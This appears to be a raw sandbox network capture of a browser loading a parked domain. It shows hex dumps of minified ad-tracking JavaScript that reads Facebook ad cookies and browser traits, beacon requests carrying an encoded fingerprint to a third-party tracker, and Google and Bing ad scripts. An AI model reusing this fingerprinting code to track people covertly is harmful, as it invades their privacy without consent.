2025-01-12 00:33:21 UTC	15877	IN	Data Raw: 31 61 30 36 37 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 69 66 28 6e 5b 65 5d 29 72 65 74 75 72 6e 20 6e 5b 65 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 69 3d 6e 5b 65 5d 3d 7b 69 3a 65 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 74 5b 65 5d 2e 63 61 6c 6c 28 69 2e 65 78 70 6f 72 74 73 2c 69 2c 69 2e 65 78 70 6f 72 74 73 2c 72 29 2c 69 2e 6c 3d 21 30 2c 69 2e 65 78 70 6f 72 74 73 7d 72 2e 6d 3d 74 2c 72 2e 63 3d 6e 2c 72 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 65 29 7b 72 2e 6f 28 74 2c 6e 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 6e 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 65 7d 29 7d 2c Data Ascii: 1a067!function(t){var n={};function r(e){if(n[e])return n[e].exports;var i=n[e]={i:e,l:!1,exports:{}};return t[e].call(i.exports,i,i.exports,r),i.l=!0,i.exports}r.m=t,r.c=n,r.d=function(t,n,e){r.o(t,n)\|\|Object.defineProperty(t,n,{enumerable:!0,get:e})},
2025-01-12 00:33:21 UTC	16384	IN	Data Raw: 22 5f 66 62 70 22 29 3b 69 66 28 74 29 7b 76 61 72 20 6e 3d 74 2e 73 70 6c 69 74 28 22 2e 22 29 3b 69 66 28 6e 2e 6c 65 6e 67 74 68 3e 3d 33 29 72 65 74 75 72 6e 20 6e 5b 6e 2e 6c 65 6e 67 74 68 2d 33 5d 2b 22 2e 22 2b 6e 5b 6e 2e 6c 65 6e 67 74 68 2d 32 5d 2b 22 2e 22 2b 6e 5b 6e 2e 6c 65 6e 67 74 68 2d 31 5d 7d 72 65 74 75 72 6e 22 2d 22 7d 2c 48 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 41 2e 51 74 28 22 5f 66 62 63 22 29 3b 69 66 28 74 29 7b 76 61 72 20 6e 3d 74 2e 73 70 6c 69 74 28 22 2e 22 29 3b 69 66 28 6e 2e 6c 65 6e 67 74 68 3e 3d 33 29 72 65 74 75 72 6e 20 6e 5b 6e 2e 6c 65 6e 67 74 68 2d 33 5d 2b 22 2e 22 2b 6e 5b 6e 2e 6c 65 6e 67 74 68 2d 32 5d 2b 22 2e 22 2b 6e 5b 6e 2e 6c 65 6e 67 74 68 2d 31 5d 7d 72 65 74 75 72 6e 22 2d 22 Data Ascii: "_fbp");if(t){var n=t.split(".");if(n.length>=3)return n[n.length-3]+"."+n[n.length-2]+"."+n[n.length-1]}return"-"},Hn:function(){var t=A.Qt("_fbc");if(t){var n=t.split(".");if(n.length>=3)return n[n.length-3]+"."+n[n.length-2]+"."+n[n.length-1]}return"-"
2025-01-12 00:33:21 UTC	16384	IN	Data Raw: 28 29 2c 64 3d 5f 2e 5f 6e 28 79 2e 43 72 28 29 29 2c 68 3d 5f 2e 79 6e 28 29 2c 67 3d 75 28 29 2c 62 3d 6f 2e 70 65 28 29 3b 74 3d 2b 6e 65 77 20 44 61 74 65 3b 76 61 72 20 45 3d 76 2e 67 65 74 53 70 61 50 61 67 65 28 29 2c 78 3d 79 2e 6e 72 28 7b 69 64 3a 6b 2e 69 64 2c 75 72 6c 3a 79 2e 4a 6e 28 72 2c 6b 2e 69 64 2c 4e 2c 6b 2e 47 72 29 2c 73 66 3a 2b 79 2e 62 72 28 29 2c 74 70 69 3a 4e 2e 74 70 69 2c 63 68 3a 4e 2e 63 68 2c 75 76 69 64 3a 4e 2e 75 76 69 64 2c 74 73 66 3a 65 2c 74 73 66 6d 69 3a 69 2c 74 73 66 75 3a 61 2c 63 62 3a 74 2c 68 6c 3a 79 2e 61 72 28 29 2c 6f 70 3a 2b 79 2e 69 72 28 29 2c 61 67 3a 70 2e 5a 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 2c 72 61 6e 64 3a 6e 2c 66 73 3a 6c 2e 77 2b 22 78 22 2b 6c 2e 68 2c 66 73 Data Ascii: (),d=_._n(y.Cr()),h=_.yn(),g=u(),b=o.pe();t=+new Date;var E=v.getSpaPage(),x=y.nr({id:k.id,url:y.Jn(r,k.id,N,k.Gr),sf:+y.br(),tpi:N.tpi,ch:N.ch,uvid:N.uvid,tsf:e,tsfmi:i,tsfu:a,cb:t,hl:y.ar(),op:+y.ir(),ag:p.Z(navigator.userAgent),rand:n,fs:l.w+"x"+l.h,fs
2025-01-12 00:33:21 UTC	16384	IN	Data Raw: 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 21 3d 3d 6e 26 26 75 5b 74 5d 3d 3d 3d 75 5b 6e 5d 7d 29 7d 76 61 72 20 72 3d 6e 28 22 41 72 72 61 79 22 29 3b 69 66 28 2d 31 21 3d 3d 72 29 7b 76 61 72 20 65 3d 5b 72 2c 6e 28 22 53 79 6d 62 6f 6c 22 29 2c 6e 28 22 50 72 6f 6d 69 73 65 22 29 5d 3b 69 66 28 63 2e 46 74 28 65 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 2d 31 21 3d 3d 74 7d 29 26 26 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 21 74 7c 7c 30 3d 3d 3d 74 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 21 31 3b 66 6f 72 28 76 61 72 20 6e 3d 74 5b 30 5d 2c 72 3d 74 5b 30 5d 2c 65 3d 31 3b 65 3c 74 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 74 5b 65 5d 3c 6e 26 26 28 6e 3d 74 5b 65 5d 29 2c 74 5b 65 5d 3e 72 26 26 28 72 3d 74 5b 65 5d 29 Data Ascii: unction(t){return t!==n&&u[t]===u[n]})}var r=n("Array");if(-1!==r){var e=[r,n("Symbol"),n("Promise")];if(c.Ft(e,function(t){return-1!==t})&&function(t){if(!t\|\|0===t.length)return!1;for(var n=t[0],r=t[0],e=1;e<t.length;e++)t[e]<n&&(n=t[e]),t[e]>r&&(r=t[e])
2025-01-12 00:33:21 UTC	16384	IN	Data Raw: 76 61 72 20 74 3d 75 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 67 65 74 45 6e 74 72 69 65 73 42 79 54 79 70 65 28 22 66 69 72 73 74 2d 69 6e 70 75 74 22 29 3b 69 66 28 74 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 6e 3d 5b 22 31 22 2c 28 74 3d 74 5b 30 5d 29 2e 6e 61 6d 65 2c 70 61 72 73 65 49 6e 74 28 74 2e 73 74 61 72 74 54 69 6d 65 29 5d 2c 72 3d 74 2e 74 61 72 67 65 74 26 26 61 2e 42 74 28 74 2e 74 61 72 67 65 74 29 3b 69 66 28 72 29 7b 76 61 72 20 65 3d 74 2e 74 61 72 67 65 74 3b 6e 2e 70 75 73 68 28 65 2e 74 61 67 4e 61 6d 65 29 2c 6e 2e 70 75 73 68 28 72 2e 78 29 2c 6e 2e 70 75 73 68 28 72 2e 79 29 2c 6e 2e 70 75 73 68 28 65 2e 69 64 29 2c 6e 2e 70 75 73 68 28 65 2e 63 6c 61 73 73 4e 61 6d 65 29 7d 72 65 74 75 72 6e 20 6e 2e 6a 6f 69 6e 28 22 2c 22 29 7d Data Ascii: var t=u.performance.getEntriesByType("first-input");if(t.length){var n=["1",(t=t[0]).name,parseInt(t.startTime)],r=t.target&&a.Bt(t.target);if(r){var e=t.target;n.push(e.tagName),n.push(r.x),n.push(r.y),n.push(e.id),n.push(e.className)}return n.join(",")}
2025-01-12 00:33:21 UTC	16384	IN	Data Raw: 26 28 72 3d 21 30 29 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 72 29 6d 2e 5a 65 2e 70 75 73 68 28 7b 73 3a 31 7d 29 3b 65 6c 73 65 7b 76 61 72 20 69 3d 30 3b 73 77 69 74 63 68 28 6f 2e 7a 74 28 29 29 7b 63 61 73 65 22 76 69 73 69 62 6c 65 22 3a 69 3d 31 3b 62 72 65 61 6b 3b 63 61 73 65 22 68 69 64 64 65 6e 22 3a 69 3d 32 3b 62 72 65 61 6b 3b 63 61 73 65 22 70 72 65 72 65 6e 64 65 72 22 3a 69 3d 33 7d 6d 2e 5a 65 2e 70 75 73 68 28 7b 73 3a 69 7d 29 7d 6f 2e 62 6e 28 76 2c 22 66 6f 63 75 73 22 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 72 3d 6f 2e 6d 6e 28 74 29 3b 67 28 72 29 2c 6d 2e 5a 65 2e 70 75 73 68 28 7b 73 3a 34 2c 74 3a 72 7d 29 7d 29 2c 6f 2e 62 6e 28 76 2c 22 62 6c 75 72 22 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 72 3d 6f 2e Data Ascii: &(r=!0)}catch(t){}if(r)m.Ze.push({s:1});else{var i=0;switch(o.zt()){case"visible":i=1;break;case"hidden":i=2;break;case"prerender":i=3}m.Ze.push({s:i})}o.bn(v,"focus",function(n){var r=o.mn(t);g(r),m.Ze.push({s:4,t:r})}),o.bn(v,"blur",function(n){var r=o.
2025-01-12 00:33:21 UTC	8816	IN	Data Raw: 5b 61 5d 2e 70 75 73 68 28 22 70 61 67 65 4c 6f 61 64 22 29 7d 2c 28 6f 3d 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 65 29 29 2e 73 72 63 3d 22 2f 2f 62 61 74 2e 62 69 6e 67 2e 63 6f 6d 2f 62 61 74 2e 6a 73 22 2c 6f 2e 61 73 79 6e 63 3d 31 2c 6f 2e 6f 6e 6c 6f 61 64 3d 6f 2e 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 72 65 61 64 79 53 74 61 74 65 3b 74 26 26 22 6c 6f 61 64 65 64 22 21 3d 3d 74 26 26 22 63 6f 6d 70 6c 65 74 65 22 21 3d 3d 74 7c 7c 28 63 28 29 2c 6f 2e 6f 6e 6c 6f 61 64 3d 6f 2e 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 3d 6e 75 6c 6c 29 7d 2c 28 75 3d 72 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 65 29 5b 30 5d 29 2e 70 Data Ascii: [a].push("pageLoad")},(o=r.createElement(e)).src="//bat.bing.com/bat.js",o.async=1,o.onload=o.onreadystatechange=function(){var t=this.readyState;t&&"loaded"!==t&&"complete"!==t\|\|(c(),o.onload=o.onreadystatechange=null)},(u=r.getElementsByTagName(e)[0]).p

Timestamp	Bytes transferred	Direction	Data
2025-01-12 00:33:21 UTC	6161	OUT	GET /ct?id=77721&url=http%3A%2F%2Fwww.xay.io%2F&sf=0&tpi=&ch=landingpage&uvid=23281&tsf=0&tsfmi=&tsfu=&cb=1736641999892&hl=1&op=0&ag=300509663&rand=94158160962179265907110092789080717119000882265890071078272689702602859010811966965280&fs=1280x907&fst=1280x907&np=win32&nv=google%20inc.&ref=&ss=1280x1024&nc=0&at=&di=W1siZWYiLDkzNjVdLFsiYWJuY2giLDI1XSxbLTEsIi0iXSxbLTE0LCItIl0sWy0yMSwiLSJdLFstMjksIi0iXSxbLTQxLCItIl0sWy00NCwiMCwwLDAsNSJdLFstNDYsIjAiXSxbLTU4LCItIl0sWy00LCItIl0sWy0yMCwiLSJdLFstMjYsIntcInRqaHNcIjo4NTgwMDI0LFwidWpoc1wiOjQ0MzM0NDQsXCJqaHNsXCI6MjE3MjY0OTQ3Mn0iXSxbLTI4LCJlbi1VUyxlbiJdLFstNjAsMjAxXSxbLTYzLCItIl0sWy02NSwiLSJdLFstMTksIlswLDAsMCwwLDAsMCwxLDI0LDI0LFwiLVwiLDEyODAsOTg0LDEyODAsMTAyNCwxMjgwLDk4NCwxMjgwLDkwNywwLDAsMCwwLFwiLVwiLFwiLVwiLDEyODAsOTA3LG51bGxdIl0sWy0yMiwiW1wiblwiLFwiblwiXSJdLFstNDksIi0iXSxbLTE1LCItIl0sWy0xNiwiMCJdLFstMzUsIlsxNzM2NjQxOTk5NTcxLDVdIl0sWy01MCwiLSJdLFstNjQsIi0iXSxbLTIsIjI1LGQ0SE9YVlBYN2ZOak5iMUt1N2NXOWdURzgydlFWSTZBbTlneUZBQWlIa1R5REJmTW1YWGlpcGhFRG94Y2IwRmpDWTBBM0dOdURlSkZk [TRUNCATED] Host: obseu.netgreencolumn.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: http://www.xay.io/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-12 00:33:21 UTC	436	IN	HTTP/1.1 200 OK Cache-Control: no-cache, no-store, must-revalidate Content-Type: text/javascript Date: Sun, 12 Jan 2025 00:33:21 GMT Expires: Fri, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Set-Cookie: cg_uuid=de8e8a5741eeb907a45920c2f7a55cda; Max-Age=29030400; Path=/; Expires=Sun, 14 Dec 2025 00:33:21 GMT; HttpOnly; Secure; SameSite=None Timing-Allow-Origin: http://www.xay.io Connection: close Transfer-Encoding: chunked
2025-01-12 00:33:21 UTC	743	IN	Data Raw: 63 31 35 0d 0a 74 79 70 65 6f 66 20 5f 5f 63 74 63 67 5f 63 74 5f 37 37 37 32 31 5f 65 78 65 63 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 20 26 26 20 5f 5f 63 74 63 67 5f 63 74 5f 37 37 37 32 31 5f 65 78 65 63 28 7b 22 74 63 22 3a 22 33 37 64 66 62 64 38 65 65 38 34 65 30 30 31 32 36 39 65 38 63 31 33 31 65 38 34 37 38 61 39 63 39 32 32 35 63 32 34 66 35 36 37 64 34 33 64 36 64 61 31 39 30 38 62 65 36 32 34 35 63 61 64 37 62 64 37 30 61 39 37 36 37 35 30 65 66 38 30 65 64 38 39 33 37 33 62 66 65 37 30 65 39 63 32 30 63 31 65 35 33 65 38 64 35 39 31 36 38 61 36 66 32 36 31 37 30 37 31 61 31 30 61 63 66 39 66 32 39 66 36 37 31 64 64 37 38 62 64 63 30 66 37 64 33 61 31 63 66 61 37 39 32 32 35 31 64 35 33 32 64 66 36 35 39 36 30 30 33 35 30 63 32 31 39 33 Data Ascii: c15typeof __ctcg_ct_77721_exec === 'function' && __ctcg_ct_77721_exec({"tc":"37dfbd8ee84e001269e8c131e8478a9c9225c24f567d43d6da1908be6245cad7bd70a976750ef80ed89373bfe70e9c20c1e53e8d59168a6f2617071a10acf9f29f671dd78bdc0f7d3a1cfa792251d532df659600350c2193
2025-01-12 00:33:21 UTC	2358	IN	Data Raw: 37 31 64 32 65 31 31 33 66 30 31 61 31 38 31 33 64 64 34 30 35 63 38 35 64 30 63 64 38 38 63 30 62 63 64 64 37 30 66 66 31 62 39 30 64 30 66 35 38 38 33 38 62 36 32 66 33 35 37 34 39 33 37 62 36 62 63 63 63 32 64 66 30 65 33 37 64 37 65 63 37 34 62 62 31 31 65 30 38 33 30 64 63 65 33 37 65 66 33 33 30 32 34 61 35 65 38 63 36 65 66 66 30 33 64 66 63 62 61 38 37 34 62 34 38 32 32 61 63 34 31 39 65 30 63 66 39 32 39 62 36 62 38 64 34 64 34 66 36 38 66 65 34 38 31 66 35 65 37 32 30 39 32 36 38 37 61 30 32 33 66 61 30 35 64 31 63 66 61 36 32 61 61 65 39 39 36 39 65 62 62 62 32 61 39 61 64 61 61 39 62 31 33 64 63 31 66 30 65 33 35 66 34 37 37 30 38 33 65 65 35 32 35 32 66 30 62 31 34 39 30 32 34 32 62 62 61 63 61 63 37 34 65 36 36 36 38 38 65 30 33 37 66 32 65 Data Ascii: 71d2e113f01a1813dd405c85d0cd88c0bcdd70ff1b90d0f58838b62f3574937b6bccc2df0e37d7ec74bb11e0830dce37ef33024a5e8c6eff03dfcba874b4822ac419e0cf929b6b8d4d4f68fe481f5e72092687a023fa05d1cfa62aae9969ebbb2a9adaa9b13dc1f0e35f477083ee5252f0b1490242bbacac74e66688e037f2e
2025-01-12 00:33:21 UTC	4	IN	Data Raw: 0d 0a 0d 0a Data Ascii:

Timestamp	Bytes transferred	Direction	Data
2025-01-12 00:33:22 UTC	2148	OUT	GET /tracker/tc_imp.gif?e=37dfbd8ee84e001269e8c131e8478a9c9225c24f567d43d6da1908be6245cad7bd70a976750ef80ed89373bfe70e9c20c1e53e8d59168a6f2617071a10acf9f29f671dd78bdc0f7d3a1cfa792251d532df659600350c219301020932555ac3ed3f1e77be26bb25cb43e29b25f45471ad0f2e6410d25afe5aecd2948a7fe07f52a13ad2a24710d14e681f2d1586d31c64e56ac8bf88b71208fe59f1d329e921c46bcf40e25c7ea8290ee95c400035db386ee683e99332bd06b442c316f0496f70bfc72f02431e24f97999c140ab51258fc6e279126332a5de6c7fd6d5431f2b436f0715a7902c701e56f2ab0b2093aef6298ee35d60013ee9f3e4869265bcd5d759bf079d5d3a63ccea9de6f13599d9b13a93350983f0c82a1e1ea3683aba8c063abbcaf1778807fc4eae965d8013d9c56d9c7c71d69338c722d795f6bbdea6fd4075e93daaa9ae7c433ebdcf71d2e113f01a1813dd405c85d0cd88c0bcdd70ff1b90d0f58838b62f3574937b6bccc2df0e37d7ec74bb11e0830dce37ef33024a5e8c6eff03dfcba874b4822ac419e0cf929b6b8d4d4f68fe481f5e72092687a023fa05d1cfa62aae9969ebbb2a9adaa9b13dc1f0e35f477083ee5252f0b1490242bbacac74e66688e037f2e62eb211bc23c1168d40c5a22ec60426e3ad94603b3e690a23151442d998e82c927cb20030067f83 [TRUNCATED] Host: obseu.netgreencolumn.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: http://www.xay.io/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: cg_uuid=de8e8a5741eeb907a45920c2f7a55cda
2025-01-12 00:33:22 UTC	230	IN	HTTP/1.1 200 OK Cache-Control: no-cache, no-store, must-revalidate Content-Length: 43 Content-Type: image/gif Date: Sun, 12 Jan 2025 00:33:22 GMT Expires: Fri, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Connection: close
2025-01-12 00:33:22 UTC	43	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 db df ef 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b Data Ascii: GIF89a!,D;

Timestamp	Bytes transferred	Direction	Data
2025-01-12 00:33:22 UTC	6042	OUT	GET /ct?id=77721&url=http%3A%2F%2Fwww.xay.io%2F&sf=0&tpi=&ch=landingpage&uvid=23281&tsf=0&tsfmi=&tsfu=&cb=1736641999892&hl=1&op=0&ag=300509663&rand=94158160962179265907110092789080717119000882265890071078272689702602859010811966965280&fs=1280x907&fst=1280x907&np=win32&nv=google%20inc.&ref=&ss=1280x1024&nc=0&at=&di=W1siZWYiLDkzNjVdLFsiYWJuY2giLDI1XSxbLTEsIi0iXSxbLTE0LCItIl0sWy0yMSwiLSJdLFstMjksIi0iXSxbLTQxLCItIl0sWy00NCwiMCwwLDAsNSJdLFstNDYsIjAiXSxbLTU4LCItIl0sWy00LCItIl0sWy0yMCwiLSJdLFstMjYsIntcInRqaHNcIjo4NTgwMDI0LFwidWpoc1wiOjQ0MzM0NDQsXCJqaHNsXCI6MjE3MjY0OTQ3Mn0iXSxbLTI4LCJlbi1VUyxlbiJdLFstNjAsMjAxXSxbLTYzLCItIl0sWy02NSwiLSJdLFstMTksIlswLDAsMCwwLDAsMCwxLDI0LDI0LFwiLVwiLDEyODAsOTg0LDEyODAsMTAyNCwxMjgwLDk4NCwxMjgwLDkwNywwLDAsMCwwLFwiLVwiLFwiLVwiLDEyODAsOTA3LG51bGxdIl0sWy0yMiwiW1wiblwiLFwiblwiXSJdLFstNDksIi0iXSxbLTE1LCItIl0sWy0xNiwiMCJdLFstMzUsIlsxNzM2NjQxOTk5NTcxLDVdIl0sWy01MCwiLSJdLFstNjQsIi0iXSxbLTIsIjI1LGQ0SE9YVlBYN2ZOak5iMUt1N2NXOWdURzgydlFWSTZBbTlneUZBQWlIa1R5REJmTW1YWGlpcGhFRG94Y2IwRmpDWTBBM0dOdURlSkZk [TRUNCATED] Host: obseu.netgreencolumn.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: cg_uuid=de8e8a5741eeb907a45920c2f7a55cda
2025-01-12 00:33:22 UTC	276	IN	HTTP/1.1 200 OK Cache-Control: no-cache, no-store, must-revalidate Content-Type: text/javascript Date: Sun, 12 Jan 2025 00:33:22 GMT Expires: Fri, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Timing-Allow-Origin: undefined Connection: close Transfer-Encoding: chunked
2025-01-12 00:33:22 UTC	903	IN	Data Raw: 63 31 35 0d 0a 74 79 70 65 6f 66 20 5f 5f 63 74 63 67 5f 63 74 5f 37 37 37 32 31 5f 65 78 65 63 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 20 26 26 20 5f 5f 63 74 63 67 5f 63 74 5f 37 37 37 32 31 5f 65 78 65 63 28 7b 22 74 63 22 3a 22 33 37 64 66 62 64 38 65 65 38 34 65 30 30 31 32 36 39 65 38 63 31 33 31 65 38 34 37 38 61 39 66 39 32 32 35 63 32 34 66 35 36 37 64 34 33 64 36 64 61 31 39 30 38 62 65 36 32 34 35 63 61 64 37 62 64 37 30 61 39 37 36 37 35 30 65 66 38 30 65 64 38 39 33 37 33 62 66 65 37 30 65 39 63 32 30 63 31 65 35 33 65 38 64 35 39 31 36 38 61 36 66 32 36 31 37 30 37 31 61 31 30 61 63 66 39 66 32 39 66 36 37 31 64 64 37 38 62 64 63 30 66 37 64 33 61 31 63 66 61 37 39 32 32 35 31 64 35 33 32 64 66 36 35 39 36 30 30 33 35 30 63 32 31 39 33 Data Ascii: c15typeof __ctcg_ct_77721_exec === 'function' && __ctcg_ct_77721_exec({"tc":"37dfbd8ee84e001269e8c131e8478a9f9225c24f567d43d6da1908be6245cad7bd70a976750ef80ed89373bfe70e9c20c1e53e8d59168a6f2617071a10acf9f29f671dd78bdc0f7d3a1cfa792251d532df659600350c2193
2025-01-12 00:33:22 UTC	2202	IN	Data Raw: 30 39 32 36 38 37 61 30 32 33 66 61 30 35 64 31 63 66 61 36 32 61 61 65 39 39 36 39 65 62 62 62 32 61 39 61 64 61 61 39 62 31 33 64 63 31 66 30 65 33 35 66 34 37 37 30 38 33 65 65 35 32 35 32 66 30 62 31 34 39 30 32 34 32 62 62 61 63 61 63 37 34 65 36 36 36 38 38 65 30 33 37 66 32 65 36 32 65 62 32 31 31 62 63 32 33 63 31 31 36 38 64 34 30 63 35 61 32 32 65 63 36 30 34 32 36 65 33 61 64 39 34 36 30 33 62 33 65 36 39 30 61 32 33 31 35 31 34 34 32 64 39 39 38 65 38 32 63 39 32 37 63 62 32 30 30 33 30 30 36 37 66 38 33 63 35 30 61 63 64 38 34 30 61 34 66 62 62 65 31 38 62 61 38 62 36 37 65 63 33 66 33 65 35 66 62 38 35 66 65 61 39 66 35 34 61 34 36 33 35 66 32 35 39 63 34 64 35 32 31 32 62 66 34 30 61 33 62 37 61 61 63 30 39 30 62 33 62 30 34 39 31 30 64 66 Data Ascii: 092687a023fa05d1cfa62aae9969ebbb2a9adaa9b13dc1f0e35f477083ee5252f0b1490242bbacac74e66688e037f2e62eb211bc23c1168d40c5a22ec60426e3ad94603b3e690a23151442d998e82c927cb20030067f83c50acd840a4fbbe18ba8b67ec3f3e5fb85fea9f54a4635f259c4d5212bf40a3b7aac090b3b04910df

Timestamp	Bytes transferred	Direction	Data
2025-01-12 00:33:23 UTC	373	OUT	GET /adsense/domains/caf.js?pac=0 HTTP/1.1 Host: syndicatedsearch.goog Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-12 00:33:23 UTC	717	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Vary: Accept-Encoding Content-Type: text/javascript; charset=UTF-8 Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="ads-afs-ui" Report-To: {"group":"ads-afs-ui","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/ads-afs-ui"}]} Content-Length: 147115 Date: Sun, 12 Jan 2025 00:33:23 GMT Expires: Sun, 12 Jan 2025 00:33:23 GMT Cache-Control: private, max-age=3600 ETag: "5203081428332967614" X-Content-Type-Options: nosniff Link: <https://syndicatedsearch.goog>; rel="preconnect" Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-01-12 00:33:23 UTC	673	IN	Data Raw: 69 66 28 21 77 69 6e 64 6f 77 5b 27 67 6f 6f 67 6c 65 4e 44 54 5f 27 5d 29 7b 77 69 6e 64 6f 77 5b 27 67 6f 6f 67 6c 65 4e 44 54 5f 27 5d 3d 28 6e 65 77 20 44 61 74 65 28 29 29 2e 67 65 74 54 69 6d 65 28 29 3b 7d 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 41 6c 74 4c 6f 61 64 65 72 3d 33 3b 76 61 72 20 73 66 66 65 44 61 74 61 5f 3d 7b 73 65 72 76 69 63 65 5f 68 6f 73 74 3a 22 73 79 6e 64 69 63 61 74 65 64 73 65 61 72 63 68 2e 67 6f 6f 67 22 2c 68 61 73 68 3a 22 35 39 34 32 35 39 39 38 31 32 32 37 30 35 36 32 37 32 35 22 2c 70 61 63 6b 61 67 65 73 3a 22 64 6f 6d 61 69 6e 73 22 2c 6d 6f 64 75 6c 65 3a 22 61 64 73 22 2c 76 65 72 73 69 6f 6e 3a 22 31 22 2c 6d 3a 7b 63 65 69 3a 22 31 37 33 30 31 34 33 37 2c 31 37 33 30 31 34 Data Ascii: if(!window['googleNDT_']){window['googleNDT_']=(new Date()).getTime();}(function() {window.googleAltLoader=3;var sffeData_={service_host:"syndicatedsearch.goog",hash:"5942599812270562725",packages:"domains",module:"ads",version:"1",m:{cei:"17301437,173014
2025-01-12 00:33:23 UTC	1390	IN	Data Raw: 30 30 30 30 2c 73 73 64 6c 3a 22 59 58 42 77 63 33 42 76 64 43 35 6a 62 32 30 73 59 6d 78 76 5a 33 4e 77 62 33 51 75 59 32 39 74 4c 47 4a 79 4c 6d 4e 76 62 53 78 6a 62 79 35 6a 62 32 30 73 59 32 78 76 64 57 52 6d 63 6d 39 75 64 43 35 75 5a 58 51 73 5a 58 55 75 59 32 39 74 4c 47 68 76 63 48 52 76 4c 6d 39 79 5a 79 78 70 62 69 35 75 5a 58 51 73 64 48 4a 68 62 6e 4e 73 59 58 52 6c 4c 6d 64 76 62 32 63 73 64 57 73 75 59 32 39 74 4c 48 56 7a 4c 6d 4e 76 62 53 78 33 5a 57 49 75 59 58 42 77 22 2c 63 64 6c 3a 66 61 6c 73 65 2c 63 64 68 3a 22 73 79 6e 64 69 63 61 74 65 64 73 65 61 72 63 68 2e 67 6f 6f 67 22 2c 63 64 65 6d 3a 7b 22 61 66 73 5f 61 61 5f 62 61 73 65 6c 69 6e 65 22 3a 35 30 30 2c 22 61 66 73 5f 63 68 61 74 62 6f 74 22 3a 30 2c 22 61 66 73 5f 63 68 61 Data Ascii: 0000,ssdl:"YXBwc3BvdC5jb20sYmxvZ3Nwb3QuY29tLGJyLmNvbSxjby5jb20sY2xvdWRmcm9udC5uZXQsZXUuY29tLGhvcHRvLm9yZyxpbi5uZXQsdHJhbnNsYXRlLmdvb2csdWsuY29tLHVzLmNvbSx3ZWIuYXBw",cdl:false,cdh:"syndicatedsearch.goog",cdem:{"afs_aa_baseline":500,"afs_chatbot":0,"afs_cha
